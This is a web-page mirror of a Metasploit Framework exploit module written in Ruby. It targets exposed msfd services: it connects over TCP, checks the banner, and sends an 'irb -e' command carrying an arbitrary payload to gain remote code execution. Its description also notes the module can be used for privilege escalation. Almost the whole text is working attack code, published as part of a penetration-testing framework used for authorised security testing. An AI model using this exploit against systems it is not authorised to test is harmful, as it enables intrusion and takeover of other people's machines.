Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Metasploit msfd Remote Code Execution',

16
        'Description' => %q{

17
          Metasploit's msfd-service makes it possible to get a msfconsole-like

18
          interface over a TCP socket. If this socket is accessible on a remote

19
          interface, an attacker can execute commands on the victim's machine.

20


21
          If msfd is running with higher privileges than the current local user,

22
          this module can also be used for privilege escalation. In that case,

23
          port forwarding on the compromised host can be used.

24


25
          Code execution is achieved with the msfconsole command: irb -e 'CODE'.

26
        },

27
        'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',

28
        'License' => BSD_LICENSE,

29
        'Platform' => "ruby",

30
        'Arch' => ARCH_RUBY,

31
        'Payload' => {

32
          'Space' => 8192, # Arbitrary limit

33
          'BadChars' => "\x27\x0a",

34
          'DisableNops' => true

35
        },

36
        'Targets' => [

37
          [ 'Automatic', {} ]

38
        ],

39
        'Privileged' => false,

40
        'DisclosureDate' => '2018-04-11', # Vendor notification

41
        'DefaultTarget' => 0,

42
        'Notes' => {

43
          'Reliability' => UNKNOWN_RELIABILITY,

44
          'Stability' => UNKNOWN_STABILITY,

45
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

46
        }

47
      )

48
    )

49


50
    register_options(

51
      [

52
        Opt::RPORT(55554)

53
      ]

54
    )

55
  end

56


57
  def check

58
    connect

59
    data = sock.get_once

60
    if data.include?("msf")

61
      disconnect

62
      return Exploit::CheckCode::Appears

63
    end

64
    disconnect

65
    return Exploit::CheckCode::Unknown

66
  end

67


68
  def exploit

69
    connect

70
    sock.get_once

71
    sock.put "irb -e '" + payload.encoded + "'\n"

72
    disconnect

73
  end

74
end

75


76